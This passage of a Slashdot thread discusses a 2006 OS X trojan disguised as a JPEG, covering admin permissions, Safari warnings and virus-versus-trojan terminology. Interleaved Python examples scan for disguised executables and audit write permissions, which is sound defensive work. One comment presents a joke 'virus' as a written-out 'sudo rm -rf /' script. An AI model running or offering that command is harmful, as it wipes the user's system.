      Mac admin accounts are not like Windows admin accounts. They are not root accounts. You still have to sudo to do any root-level administration.

      --
      A Government Is a Body of People, Usually Notably Ungoverned
    9. Re:FUD of the day by javaxman · · Score: 1
      What are you talking about? Admin accounts normally get password popups to do anything like this (system updates, system-wide installers, etc.). Are you saying in this specific instance it doesn't?

      Well, actually, that's on a time-related basis ( if you've authenticated recently it won't always ask again ), I think, and some of the forum posts I saw seemed to indicate that for whatever reason, this doesn't trigger that on Admin accounts, I think because it only writes to /Applications, not /System or anything without Admin-write privilege set. Sometimes the authentication you're talking about is triggered by the installation process, too, not the system, so.... yea, running as Admin, not a good idea.

      I'm not sure, of course. Still waiting for further information.

    10. Re:FUD of the day by TheNumberless · · Score: 2, Interesting

      That's why the first thing I do on a new OS X system is to set timestamps_timeout to 0 in sudoers. It eliminates this grace period, requiring a password prompt for every Admin action. With this change, I think running as Admin can be pretty safe.

      I could be overlooking some other security flaws, though...

    11. Re:FUD of the day by Onan · · Score: 1
      When you run it, an admin password prompt is displayed by OS X, and you have to enter it to continue.
      ...Unless you are running an admin account. Then it just runs.
      Uh, no. Really no.

      The effect of an admin account is one level more strict than this. Any user, when attempting to install a package or modify system directories, will be prompted for authentication, and only an admin account's name and password can be used to approve the request. Both types of accounts will be asked, the difference is that a non-admin account can't say yes.

    12. Re:FUD of the day by 99BottlesOfBeerInMyF · · Score: 1

      Both types of accounts will be asked, the difference is that a non-admin account can't say yes.

      Have you actually tried this? All three resources I've looked at, each written by security people doing write-ups have disagreed with you. It only touches the applications and Library directories, both of which are writable by an admin account without a password. Try writing a file if you don't believe me.

      From the initial Ambrosia write up: "It requires the admin password if you're not running as an admin user." I think you are misreading the analysis. Non-admin users require an admin password to write to the shared Applications directory, which this virus does. This is separate from admin users needing to type their password when they want to use superuser privileges like adding a kernel module, driver, or the like.

    13. Re:FUD of the day by javaxman · · Score: 1
      That's why the first thing I do on a new OS X system is to set timestamps_timeout to 0 in sudoers. It eliminates this grace period, requiring a password prompt for every Admin action. With this change, I think running as Admin can be pretty safe.

      Remember, I'm not sure about that part. I think what could be going on is that the app only writes into /Applications and /Library, which are writable by Admin, but not to /System or any other locations that aren't admin-writable... thus, it doesn't trigger the authentication dialog for the admin user no matter what, it's only triggered if you aren't in the admin group.

      Of course, every user everywhere is always at risk always from a trojan that wipes out all of their writeable files. There's not much that can be practically done to prevent that, outside of user training.
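
The disagreement between comments 11 and 12 above, and the guess in comment 13, come down to plain Unix permission bits: on a stock install /Applications and /Library are owned by root with group admin and mode 775, so any account in the admin group can write there with no authorization prompt at all, while /System is root-owned 755. The following is an added example written for this page, not code from the thread or from Apple, that works this out from stat data. The layout it checks is a constructed table whose owners, groups and modes are assumptions modelled on an OS X install of that era (group admin assumed to be gid 80, the first account assumed to be uid 501); `audit_live` applies the same test to the real filesystem for the current user.

```python
"""Added example, not code from the thread or Apple: decide from plain
Unix permission bits which directories a process can write to with no
password prompt at all. SAMPLE_LAYOUT is a constructed table whose
owners, groups and modes are assumptions modelled on a stock OS X
install (group admin assumed gid 80, first user assumed uid 501)."""
import os
from collections import namedtuple

Entry = namedtuple("Entry", "path uid gid mode")


def can_write(entry, uid, gids):
    """POSIX access rule: owner bits if you own it, else group bits if
    the directory's group is any of your groups, else the 'other' bits.
    uid 0 is deliberately not special-cased: root always wins, and an
    admin-group account is precisely not root."""
    if entry.uid == uid:
        return bool(entry.mode & 0o200)
    if entry.gid in gids:
        return bool(entry.mode & 0o020)
    return bool(entry.mode & 0o002)


def silently_writable(entries, uid, gids):
    """Paths in entries that uid/gids can write without authenticating."""
    return [e.path for e in entries if can_write(e, uid, gids)]


SAMPLE_LAYOUT = [  # constructed; see the docstring for the assumptions
    Entry("/Applications", 0, 80, 0o775),
    Entry("/Library", 0, 80, 0o775),
    Entry("/System", 0, 0, 0o755),
    Entry("/usr/bin", 0, 0, 0o755),
    Entry("/Users/alice", 501, 20, 0o755),
    Entry("/tmp", 0, 0, 0o1777),
]
ADMIN_USER = (501, {20, 80})      # first account created at setup (assumed)
STANDARD_USER = (502, {20})       # a later, non-admin account (assumed)


def compare_accounts():
    """What each constructed account could modify with no prompt."""
    return {
        "admin": silently_writable(SAMPLE_LAYOUT, *ADMIN_USER),
        "standard": silently_writable(SAMPLE_LAYOUT, *STANDARD_USER),
    }


def audit_live(paths, uid=None, gids=None):
    """Same test against the real filesystem, for the current user by
    default. Caveat: macOS ACLs can grant or deny beyond these bits;
    this reads only the classic mode, which is what the thread debates."""
    uid = os.getuid() if uid is None else uid
    if gids is None:
        gids = set(os.getgroups()) | {os.getgid()}
    entries = []
    for path in paths:
        try:
            st = os.stat(path)
        except OSError:
            continue  # absent on this host; skip rather than guess
        entries.append(Entry(path, st.st_uid, st.st_gid, st.st_mode & 0o7777))
    return silently_writable(entries, uid, gids)


if __name__ == "__main__":
    for account, paths in compare_accounts().items():
        print(f"{account}: writable without a prompt -> {paths}")
    print("this host:", audit_live([e.path for e in SAMPLE_LAYOUT]))
```

For the constructed layout the admin account gets /Applications, /Library, its own home and /tmp, the standard account only /tmp; that is the whole difference the thread is arguing about, and it is a filesystem fact rather than anything the authorization dialog decides. The sudo grace period from comment 10 is a separate mechanism again (the sudoers option is named `timestamp_timeout`) and never enters into an ordinary file write.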

    14. Re:FUD of the day by Anonymous Coward · · Score: 0

      no crontab in OS X

    15. Re:FUD of the day by njyoder · · Score: 1

      Other browsers warn too, though not for compressed files, but that means this isn't an OS X virus or trojan but a user-run program.

      Wrong. DO NOT SPEAK IF YOU DON'T KNOW WHAT THE TERMS 'VIRUS' AND 'TROJAN' MEAN. My comment here refutes all of these ridiculous allegations. Most windows worms/viruses require the user to initially run it. That doesn't change the fact that it tries to infect applications (virus) and spread itself via the internet (worm).

      A program written "inside of the user's space" as you put it wouldn't have much to do and wouldn't propagate

      Aside from spread! It has full internet access, moron. It can wreak havoc on all of your work (which is stored with user privileges). PLUS, because this is a wetware flaw, it obviously works on ignorance of users, thus requiring the user to do a routine action of entering a password is meaningless. They'll type in the password just like users blindly click through windows. Of course, it's not even necessary.

    16. Re:FUD of the day by Starxxon · · Score: 1

      If I'm not mistaken it warns you that it "might be" an application, as it does with all archives in .zip, .gtz, or .dmg format. Also, not everyone uses Safari.

      Safari will try to identify every file found in an archive. It can scan through a number of formats, including .dmg, .zip and .gz, to look for executables. If no executable is found and all files are identified as safe, the archive is decompressed and there is no warning. If an executable is found, and that includes .exe files, a warning will say "This file contains an application."

      Safari will also raise a flag if it cannot be sure everything contained in the file is safe. This happens when it encounters a file it cannot decompress and scan itself, like in the discussed example, where a .tar file is contained inside a .gz file. Safari checks inside the .gz file, and since it cannot be sure of what's inside the .tar, it gives the warning: "This file might contain an application", with the option to cancel.

      So you are right, this is what happens in this case.

      But...

      Other browsers will throw "might contain programs or bad things" dialogs for just about everything you try to download. Inexperienced users will see the message, and might decide to stop downloading files from fear of viruses. But those who decide to download files anyway will face this dialog each time, to a point where clicking OK becomes automatic, and the original message loses its meaning.

      On Safari, the warning only appears when an application is downloaded, or when the archive contains some compressed file in a seldom used format like .tar. So the most inexperienced users will rarely get a warning when downloading files, except when downloading an application.

      That makes it a learning process to the user. They will learn that only applications or files containing obscure files like .tar trigger the warning, and that a .zip folder full of text, images or movies doesn't. In that case, most Safari users will find it abnormal that this supposed gzipped folder that is supposed to contain photos instead contains a .tar and triggers a warning.

      I'm not saying that it's 100 percent idiot proof. But it's certainly better than the "every file on the internet can be bad" simplistic approach taken by other browsers.
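
The archive check described in the post above (flag an archive if any member is executable, whatever it is called), and the hide-an-executable-in-a-dotfolder trick lcde describes in comment 95, both reduce to looking at file content rather than file names. The following is an added example written for this page, not code from the thread, from Apple or from Safari. The Mach-O, ELF, JPEG, PNG, GIF and shebang signatures are real; the archive it scans, its file names, and the choice of which extensions count as "data a user would not expect to execute" are constructed for the example and are not from the thread.

```python
"""Added example, not code from the thread or Apple: spot executables
posing as data files, either packed in a .tar.gz (how the thread's
package was delivered) or planted under a home directory, dotfolders
included. Magic numbers are real; the sample archive is constructed."""
import io
import os
import tarfile
import tempfile

# Content signatures: every Mach-O variant (32/64-bit, both byte orders,
# fat binaries), ELF for Linux/BSD hosts, and shebang scripts.
EXECUTABLE_MAGIC = {
    b"\xfe\xed\xfa\xce": "Mach-O 32-bit (big-endian)",
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit (little-endian)",
    b"\xfe\xed\xfa\xcf": "Mach-O 64-bit (big-endian)",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit (little-endian)",
    b"\xca\xfe\xba\xbe": "Mach-O fat binary (same magic as Java class files)",
    b"\x7fELF": "ELF",
    b"#!": "script with shebang",
}
IMAGE_MAGIC = {b"\xff\xd8\xff": "JPEG", b"\x89PNG\r\n\x1a\n": "PNG",
               b"GIF87a": "GIF", b"GIF89a": "GIF"}
# Extensions a user reads as plain data (constructed list); an executable
# behind one of these is what the thread calls a disguised file.
DATA_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".css", ".txt", ".html"}
EXECUTABLE_KINDS = set(EXECUTABLE_MAGIC.values())


def classify(head):
    """Name the content type from the first bytes of a file."""
    for table in (EXECUTABLE_MAGIC, IMAGE_MAGIC):
        for magic, name in table.items():
            if head.startswith(magic):
                return name
    return "unknown"


def is_executable(head, mode):
    """Executable by content, or by any execute permission bit."""
    return classify(head) in EXECUTABLE_KINDS or bool(mode & 0o111)


def is_disguised(name, head, mode):
    """The name claims a data file but content or mode says executable."""
    ext = os.path.splitext(name)[1].lower()
    return ext in DATA_EXTENSIONS and is_executable(head, mode)


def scan_archive(data):
    """Archive-level check: list every regular member of a .tar.gz that is
    executable, regardless of what it is called (the Safari-style warning)."""
    found = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for m in tar:
            if not m.isfile():
                continue
            head = tar.extractfile(m).read(8)
            if is_executable(head, m.mode):
                found.append((m.name, classify(head)))
    return found


def scan_directory(root):
    """Home-directory sweep (hidden dirs included): report files whose
    extension says data but whose bytes or mode say executable."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(8)
                mode = os.stat(path).st_mode
            except OSError:
                continue  # unreadable or vanished; skip it
            if is_disguised(fname, head, mode):
                found.append((os.path.relpath(path, root), classify(head)))
    return sorted(found)


# Constructed sample (not the real trojan): a genuine JPEG header, a
# Mach-O header named like a picture, a Mach-O hidden as a stylesheet
# in a dotfolder, a plainly named shell script, and a text file.
SAMPLE_MEMBERS = [
    ("screenshots/shot1.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 28, 0o644),
    ("screenshots/shot2.jpg", b"\xcf\xfa\xed\xfe" + b"\x00" * 28, 0o755),
    ("screenshots/.cache/chrome_main.css", b"\xce\xfa\xed\xfe" + b"\x00" * 28, 0o644),
    ("screenshots/install.sh", b"#!/bin/sh\necho hi\n", 0o755),
    ("screenshots/readme.txt", b"just text\n", 0o644),
]


def build_sample():
    """Pack SAMPLE_MEMBERS into an in-memory .tar.gz."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, body, mode in SAMPLE_MEMBERS:
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(body), mode
            tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()


def scan_sample_on_disk():
    """Write the sample out by hand (keeping modes) and sweep the tree."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body, mode in SAMPLE_MEMBERS:
            dest = os.path.join(tmp, name)
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            with open(dest, "wb") as out:
                out.write(body)
            os.chmod(dest, mode)
        return scan_directory(tmp)


if __name__ == "__main__":
    for name, kind in scan_archive(build_sample()):
        print(f"archive member is executable: {name} ({kind})")
    for name, kind in scan_sample_on_disk():
        print(f"disguised file on disk: {name} ({kind})")
```

The two scans deliberately differ in scope. `scan_archive` flags every executable member, so the plainly named `install.sh` is reported alongside the disguised ones, which is the right behaviour for a "this archive contains an application" warning. `scan_directory` is the narrower sweep lcde's post calls for: only executables hiding behind a data extension are reported, so a legitimate script in your home directory is not noise. Both check content first and the execute bit second, so a Mach-O dropped with mode 644 (which could be chmod'ed later) is still caught, and the chmod-only variant (a text file marked executable and named `.css`) is caught by the mode test.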

    17. Re:FUD of the day by Sky99 · · Score: 1

      Well, as if the explorer stuff kept people from clicking dumbly on any single thing downloaded from nowhere? How would you keep them from clicking on something bad, except by having antivirus software scanning the incoming files? Then the power user would disable it and scan by himself when he had a doubt about the file... Still, on an OS-X system, one could expect it to warn when some dangerous actions are being made by software, like deleting massive amounts of files... That would add another "confirm" box, but might help...

  102. It doesn't have to be an app by Anonymous Coward · · Score: 0

    It can work as a shell script too.
    For example:
    http://srmail.net/cool.dmg

  103. Re:It's not a virus... eet's ahhh... eeet's ahhh by davidsyes · · Score: 1

    TriRus or a VoJan...

    Well, then, if the user is careless enough to provide the admin password for one of these "concept gone wild" pieces of code, then at SOME point it is no longer the case of:

    "The executable never actually crashes any part of the OS to gain control of the OS and do something that the user doesn't authorize."

    It probably won't need to 'crash' the os, but it'll have free reign to run, or worse, free run to reign OVER your system (hmm, think I just coined a cool phrase...).

    Who cares that it "doesn't authorize" beforehand? Isn't the worm/virus/trojan going to get access?

    I think one way to deal with this is to make the OS provide the user or admin the option to "chunkify" the task so that an operation that is wide in scope and deep in penetration has to "hit up against" an execution firewall. Meaning: intense processes could be made to be "stopped" or "interrupted" to help contain SOME of the damage. A process could be divided into, say, 10ths, and the user has to SIT there. Most of us are sitting there, anyway. If it's a short process, then clicking yes 10 times to some rogue or new app could be disguised by making the OS show some OS-useful/informative admin/user-needed material. If it's a LONG process, then most likely this will slow down the admins and FORCE them to THINK about what they're going to be implementing.

    Just some ideas. Don't know if parallels already exist. So, not claiming anything new or novel, except my "free reign to run/free run to reign"

    --
    Previously: "Linux... Toward the Sunrise..." Now: "Linux... Toward the-- No, now, part of Every Sunrise"
  104. First Time Run Dialog by jscotta44 · · Score: 1

    I have not installed brand new, never before run software on my Mac lately - too busy trying to get my work done. But I seem to recall that the very first time an application is run, a dialog pops open and asks you if you want to run it. Is that correct, or am I imagining things?

    1. Re:First Time Run Dialog by Anonymous Coward · · Score: 0

      That only happens if an application would be run for the first time indirectly--basically, by being set to the default to open a particular file type and then having someone try to open that type of file.

    2. Re:First Time Run Dialog by CableModemSniper · · Score: 1

      You are indeed correct.

      --
      Why not fork?
    3. Re:First Time Run Dialog by Starxxon · · Score: 1

      It doesn't display the dialog for a unix script...That's the problem with this one.

    4. Re:First Time Run Dialog by CableModemSniper · · Score: 1

      A unix script can't be wrapped up in an app bundle to hide its icon. Well it can, but as soon as it does, it becomes an application and follows the same rule. Furthermore, unix scripts aren't double-clickable unless they have a .command extension. I take that back, the command extension only lets it run in terminal. But once you change the extension to command it gets a "command" icon. Regardless, to make it a double-clickable bundle with an arbitrary icon, it becomes an app by definition and you get the warning.

      --
      Why not fork?
  105. Re:MOD PARENT UP - IT IS A VIRUS by bprime · · Score: 1

    you would see from your own quoted definitions that this is not a virus.

    lol no its not a virus
  106. LOL by Anonymous Coward · · Score: 0

    WELL PLAYED, SIR!

  107. Stupidity at it's best by nexcomlink · · Score: 1

    I don't see how this can be called a virus. The last time I remember, a virus used some type of exploit either with a system process or 3rd party application which is granted administration privileges without the user knowing. If this so called virus comes up asking for a password, to me it's nothing more than a simple little script made by an amateur. You can do this with Applescript as well. Last time I checked a trojan does not replicate itself. A virus does but this is by far not a virus, more like a pitiful excuse for one at least.

  108. not the same by Anonymous Coward · · Score: 0

    "Once the media gets a hold of a blanket term, we're stuck with it. Yes, it's technically a trojan. But nowadays malware that's not adware gets lumped into the virus category. Take a look at the term "hacker." "Cracker" would be the preferred term for a bad hacker, but the media still uses "hacker.""

    Hacker has always been the correct term since the 80's. Only recently have people unsuccessfully tried to make up a new word, and change the meaning. Misusing the word virus is a different matter, but this thing self-propagates so it's more than just a trojan

  109. Useless Distinction by nuckfuts · · Score: 0, Flamebait

    To all the purists out there who can't resist piping up with "It's not a virus - it's a trojan":

    It's a useless distinction to say that trojans are not viruses because they require user intervention.

    Would you go around saying that gonorrhoea is not a true disease because you have to do something voluntarily to get it?

    Trojans are a CLASS of virus.

    1. Re:Useless Distinction by nuckfuts · · Score: 1

      To all the jackasses out there who can't resist modding any negative comment as flamebait:

      Think about what flamebait actually means. It is a deliberate attempt to piss someone off and start a flame war. The parent is making a simple statement - that going around repeating "a trojan is not a virus" may be technically correct but adds no valuable insight to the discussion. This statement is hardly an incitement to argue. Nobody would conceivably feel strongly enough about it to respond.

  110. Re:Phew! an Anonymous PRESCIENT Coward.. by davidsyes · · Score: 1

    Apple: Apple to 'Switch' to Windows?

    http://apple.slashdot.org/article.pl?sid=06/02/16/1826257

    WOW!

    --
    Previously: "Linux... Toward the Sunrise..." Now: "Linux... Toward the-- No, now, part of Every Sunrise"
  111. Mac notebooks might actually be cheaper. by Jesus_666 · · Score: 1

    The hardware isn't _that_ much better than what you can buy in the Windows world.

    Depending on the market you're looking at it's not that much better but that much cheaper/easier. Try finding a decent entry-level notebook guaranteed to run a unixoid OS. You have the Thinkpad, but IBM/Lenovo charges even more for the name tag than Apple does. Then you have... various laptops that might or might not work (and usually won't completely). And you have the iBook, a notebook known for its robustness and for an OS actually worth paying a premium for, which also happens to weigh less than the usual notebook. And comes with a usable 3D card. Not to mention the decent price. And the fact that you can choose the size of your mainboard/RAM/etc. when buying from Apple's online store. With no shipping costs. And did I mention the fact that students get a price cut?

    If you want a cheap notebook that runs something besides Windows Apple makes a _very_ good offer. I hope that the iBook stays the same with the switch to Intel (cheap, light and silent with decent battery life that is).

    --
    USE HOT GRITS WITH STATUE OF NATALIE PORTMAN (NAKED AND PETRIFIED)
  112. My tinfoil hat says this was written by... by javaxman · · Score: 1

    a Symantec or McAfee employee. Anyone want to place bets? ;-)
    I'm pretty sure I'm kidding...

  113. My OSX virus (cross-platform actually) by Lulu+of+the+Lotus-Ea · · Score: 1
    #!/bin/bash
    sudo rm -rf /

    A really nasty one too. Naturally, you'll need to enter your admin password to operate it... but that's the rule for Mac viruses, after all.

  114. All OSes are Deficient! by Burz · · Score: 1

    Where Mac OS, Windows and all the rest fail is that they don't enforce strong visual cues for executables.

    I have said this before: Superimpose all representations of executables with a red circle or red border, and these trojans will become an endangered species!

    Stop confusing data and code in the minds of users!

  115. More of a Trojan than a Virus by qazwart · · Score: 1

    This is more social engineering rather than finding a security hole:

    * Claims to be a file of interest. Usually a picture of a hot nekkid girl. This is for Mac Geeks, so it's a picture of a hot screen shot of the next OS.

    * Pasted a copy of the JPEG icon onto the app. Could happen in any OS.

    * You'll be asked for the SysAdmin password in order to "view" this JPEG. Some users may get suspicious about that, others will blindly type it in.

    * Again, shows that hiding extensions is not a good idea. If extensions are shown, the .app extension would let everyone know this is an app and not a picture.

    =======

    This is a problem much in the same light as the email phishing scams. I'd like to see a mask applied to executable icons, so that looking at an icon will let you know if it's a program or not -- even if the developer attempts to make you think the file is benign by pasting another icon on top of it. The mask will let you know it's really an executable.

    The other is user education. Users should know that viewing a JPEG shouldn't require the System Administrator's password.
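The disguise described in the comment above (a JPEG icon and a hidden extension on top of a compiled Unix executable) is something a defender can check for mechanically, because the file's first bytes do not lie even when its icon and name do. The following scanner is an added example written for this page, not code from the thread, Apple, or any AV vendor: it walks a directory, and for every file whose extension claims it is data (image, text, PDF) it compares the extension against the leading magic bytes (Mach-O in its four byte orders, the universal "fat" header, ELF, and a `#!` script line) and against the Unix execute bit. The sample files, including the name `latestpics.jpg`, are constructed inline in a temporary directory; the Mach-O and image signatures are the standard published values.

```python
"""Flag files whose extension says "image" but whose content is executable.

Added example for this thread (not from the original post or from Apple).
Sample files are constructed in a temp dir; nothing on the real system is read.
"""
import os
import stat
import tempfile

# Leading bytes of executable containers. 0xcafebabe is also the Java class
# file magic, so a .jpg starting with it is suspicious either way.
EXEC_MAGIC = {
    b"\xfe\xed\xfa\xce": "Mach-O 32-bit (big-endian)",
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit (little-endian)",
    b"\xfe\xed\xfa\xcf": "Mach-O 64-bit (big-endian)",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit (little-endian)",
    b"\xca\xfe\xba\xbe": "Mach-O universal (fat) binary",
    b"\x7fELF": "ELF",
    b"#!": "script with shebang",
}

# Leading bytes of the image formats a disguised file usually claims to be.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "JPEG",
    b"\x89PNG\r\n\x1a\n": "PNG",
    b"GIF87a": "GIF",
    b"GIF89a": "GIF",
}

# Extensions that should never hold executable content.
DATA_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".txt", ".pdf"}


def identify(head: bytes):
    """Classify a file header: ("exec", desc), ("image", desc) or ("unknown", None)."""
    for magic, desc in EXEC_MAGIC.items():
        if head.startswith(magic):
            return "exec", desc
    for magic, desc in IMAGE_MAGIC.items():
        if head.startswith(magic):
            return "image", desc
    return "unknown", None


def scan(root):
    """Walk `root`; return sorted (path, reason) pairs for masquerading files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if ext not in DATA_EXTENSIONS:
                continue  # only "data" files are checked for executable content
            with open(path, "rb") as fh:
                head = fh.read(16)
            kind, desc = identify(head)
            mode = os.stat(path).st_mode
            executable = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
            if kind == "exec":
                findings.append((path, f"{ext} file is actually {desc}"))
            elif executable:
                # Content looks like data but the execute bit is set: still worth a look.
                findings.append((path, f"{ext} file has the execute bit set"))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample: a real JPEG, a Mach-O disguised as .jpg, a +x PNG, a script."""
    root = tempfile.mkdtemp(prefix="masq-")
    samples = {
        "real.jpg": (b"\xff\xd8\xff\xe0" + b"\x00" * 12, 0o644),
        "latestpics.jpg": (b"\xcf\xfa\xed\xfe" + b"\x00" * 12, 0o755),  # x86_64 Mach-O header
        "notes.txt": (b"just text\n", 0o644),
        "shot.png": (b"\x89PNG\r\n\x1a\n" + b"\x00" * 8, 0o755),
        "run.sh": (b"#!/bin/sh\necho hi\n", 0o755),  # not a data extension, so ignored
    }
    for name, (content, mode) in samples.items():
        path = os.path.join(root, name)
        with open(path, "wb") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for path, reason in scan(build_sample_tree()):
        print(f"SUSPICIOUS: {path}: {reason}")
```

Run against a real download directory, the scanner is a cheap complement to "show all extensions": the extension check catches renamed `.app` bundles, the magic check catches a bare executable with an image name, and the execute-bit check catches archives that unpack data files with `+x` set.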

  116. Is everything a "virus" now? by jonadab · · Score: 1

    > The resultant file decompresses into what appears to be a standard JPEG icon in
    > Mac OS X but was actually a compiled Unix executable in disguise.

    Sounds like a Trojan to me. Does it attach itself to other executables? How would it do that on OS X, without admin privs? Trojans for Unix are of course possible and have been around since, to a first approximation, the beginning of time (i.e., 1970). What makes this news? Is this one spreading quite a bit, or something?

    --
    Cut that out, or I will ship you to Norilsk in a box.
  117. Yes, I CAN say "I told you so". by argent · · Score: 1

    The user first has to request that the file be downloaded, then Safari will ask if the user would like to open it, then the app is decompressed and launched, then the Finder alerts them that this is a new app being run and asks for verification to do so, then the app asks for the user's password, then the app is executed.

    Aha, so the people saying it's not a dialog box are being misleading.

    It's two dialog boxes.

    It doesn't matter if it was three dialog boxes, it's the same reflex action. In fact in more recent versions of Internet Explorer you do get multiple dialog boxes that have to be OKed for some files, and people do repeatedly check yes. Because 99.9% of the time "yes" is the normal response, and an unexpected "yes" is no different.

    How would it be better if Safari just dumped the downloaded file into the user's download directory so they had to go double-click it from there to start the same sequence of events?

    Fewer would get caught once. Almost none would get caught twice. This is what I've observed with hundreds of users over the ... 8 years now since Microsoft introduced this kind of misbehaviour with Active Desktop.

    It doesn't matter how many levels of "OK" are involved. Clicking on a link is routine, clicking the "OK" that comes up after many links are clicked on is routine. Having any kind of break in the pattern between downloading and explicitly opening a jpg file instead of having it just show up in the browser? That's an exception.

    It makes a real difference

    1. Re:Yes, I CAN say "I told you so". by Anonymous Coward · · Score: 0

      On Windows, I agree - that behavior is a problem. The problem, however, isn't with just having to click "OK", it's with Windows forcing the user to do that so often just to get regular work done that it becomes a habit to do so without looking at what you're OK-ing. We're not talking about Windows here. We're talking about OS X.

      OS X doesn't tend to get in your way in the normal course of operations so most Mac users actually take a look at what they're doing when a dialog box is displayed. Some don't, that's true, but from my 15+ years of experience with all types of users on many many different platforms, the difference between how many will get burned the first time with both download-then-open and Safari-prompts-to-open and those who'd catch it with download-then-open behavior is very small. The question then becomes "How much time are we going to waste for the vast majority of people to save a very small minority from their own stupidity?" That question is also skewed drasticly towards the Wasting Most People's Time camp given the number of chances to this point where that behavior would really cause a problem (that number now being 1, and arguably still 0 since this thing hardly has any distribution in the wild). If you're Microsoft, your answer is "Push as much work off to the user as possible." If you're Apple, your answer is "Allow most people to get their work done without unnecessary interference while still providing an adequate level of security for the minority that needs it." I'm quite happy with the Apple answer. My suggestion to you would be to stop using Windows and break away from the downward spiral of Microsoft-Mentality and see how much better your computing life becomes. :)

  118. You're wrong. by LKM · · Score: 1
    I'd call this a virus to be clear about its functionality.

    Viruses need to a) spread by themselves and b) infect applications. Worms only need to spread. Trojans need to do neither, they're simply apps disguised as something else.

    The application in question is a Trojan and possibly a Worm (depending on whether the spreading actually works). Certainly not a virus.

    1. Re:You're wrong. by 99BottlesOfBeerInMyF · · Score: 1

      Viruses need to a) spread by themselves and b) infect applications... The application in question is a Trojan and possibly a Worm

      The malware in question does infect applications, changing several parameters and attempting to cause itself to be loaded when they are run (although a bug prevents this from working). It also attempts to spread itself automatically via file sharing and the Bonjour auto discovery protocol.

  119. Orphan child by Dr.+Cody · · Score: 1

    Actually, this is just Apple's way of making up to a long lost son. You see, many years ago, Apple and Windows 3.1 got drunk at a party and one thing led to another...

    Nine months later, the bastard child of Windows 3.1 was born to much acclaim--with a red-faced DOS wondering why on earth his own child looked so little like him. Well, it's been a few years, and that son's faithful parents have both passed away. After several years drifting between orphanages and foster homes, Apple opened the local paper to find a picture of the bastard son he had nearly forgotten.

    This adoption is Apple's way of righting what went wrong and maybe, just maybe, giving this poor child a future full of hope and promise.

  120. It's not the first... by gralem · · Score: 1

    In April, 2004, CNN reported on the exact same type of trojan that used an MP3 file extension.

    Also, there is no confirmation that this screenshot propagates itself, and it definitely does NOT self-execute.

    No Big Deal.

  121. Apple mice and usability misconceptions by name_already_taken · · Score: 1
    and mac users know that "right-click" is synonymous with "control-click". it's the same thing. in fact, isn't it silly that Windows users don't have the option to do that? (or, i don't know, maybe they do.)

    Well, here's the thing - there are no one-button mice for Windows PCs, so there's no need to hold down a modifier key. Having two button mice right out of the box is far more convenient than control-clicking any day.

    I've used every version of Windows, and the first Mac I used was a 128k back in the 1980s. When I got a G4 Powerbook I was frustrated by the lack of a right-click button - OS X is clearly designed in such a way that the machine needs to have one for more than the most casual use. Right clicking makes any number of common tasks faster and easier (copying and pasting for example, both of which can be done by right clicking in OS X as well as Windows)

    I recently got a Powermac G5 quad and was glad to see the Apple Mighty Mouse in the box, however Apple's first attempt at a mouse that lets you right-click doesn't quite do it - it's as though it was designed by someone who never heard of right-clicking before; in order to right-click you have to remove all of your other fingers from the mouse which just doesn't make sense from a usability standpoint. The side squeeze buttons are great though, and I love the scroll ball. I'm hoping they come out with a software update that will fix the right-clicking.

    --
    Putting moderation advice in your .sig lowers your karma!
    1. Re:Apple mice and usability misconceptions by Myopic · · Score: 1

      if you were sitting in a roomful of random computer components, you might assemble a Windows box but the only mouse available is the USB mouse that came with an old iMac. or, as a Windows user, you might decide you prefer a one-button mouse and purchase one from a third party (there are lots available). it's untenable to claim there are "no" one-button mice for Windows, because that is tantamount to claiming there are no one-button mice at all. a USB mouse can plug into any computer. so if you plug in said one-button mouse to a Windows machine -- say it's your only option -- then why won't Windows provide a way for you to right-click? seems shortsighted to me. that was my point: a Mac can do it both ways.

      i've never tried to right click with the mighty mouse, but i did try the scroll ball, and didn't think it was very intuitive, but i only gave it a minute of trying. it was really slow, and it would inevitably scroll horizontally when i only wanted to scroll vertically.

  122. Admin accounts modify /Applications with no popups by javaxman · · Score: 1, Informative
    Just to be clear for the uninformed mods who think my +1 comment was overrated and your comment ( sorry ) is not... emphatically and once again I say that the Admin account in this case does *not* get the kind of popup you're talking about, because this trojan doesn't write to things owned by the "system" group that the admin group can't write to... it only writes to /Applications and /Library, things that the admin group has write permissions to, but that normal users can't.

    If you are running as an admin-level user, there are things that a trojan like this will have access to, and could wipe ( i.e. everything in your Applications folder ), that would be protected if you were running as a regular, non-admin-group user.

    Reading the article, or better yet, the Ambrosia Software write-up of the worm, will give you a clear idea of how an admin-group user is more susceptible to this attack than other users.

  123. one more thing by name_already_taken · · Score: 1
    I forgot my second, and more important point - who routinely uses "Get info" on files before opening them? I don't know anyone.

    That's clearly not a solution.

    --
    Putting moderation advice in your .sig lowers your karma!
  124. But I thought Trojans were... by MacDork · · Score: 1
    I thought Trojans(TM) were designed to prevent infection and replication... oh, this is Slashdot... nevermind! ;-)

    --
    "We need an expert in computers"

  125. Here is the real important news for /. crowd by Ilgaz · · Score: 1

    Thanks to Mark Allan and various other people Clam database now has information about this "whatever you call it" crap.

    ClamXav, a Cocoa GUI for the open-source Clam engine which makes it accessible to the majority of OS X users, can detect it:
    http://www.clamxav.com/

    It is free (donation) ware.

    I think it also means that the users of ISPs/Corporate Networks using the Clam engine to detect viruses won't get it via mail attachment either.

  126. First virus? by 4D6963 · · Score: 1
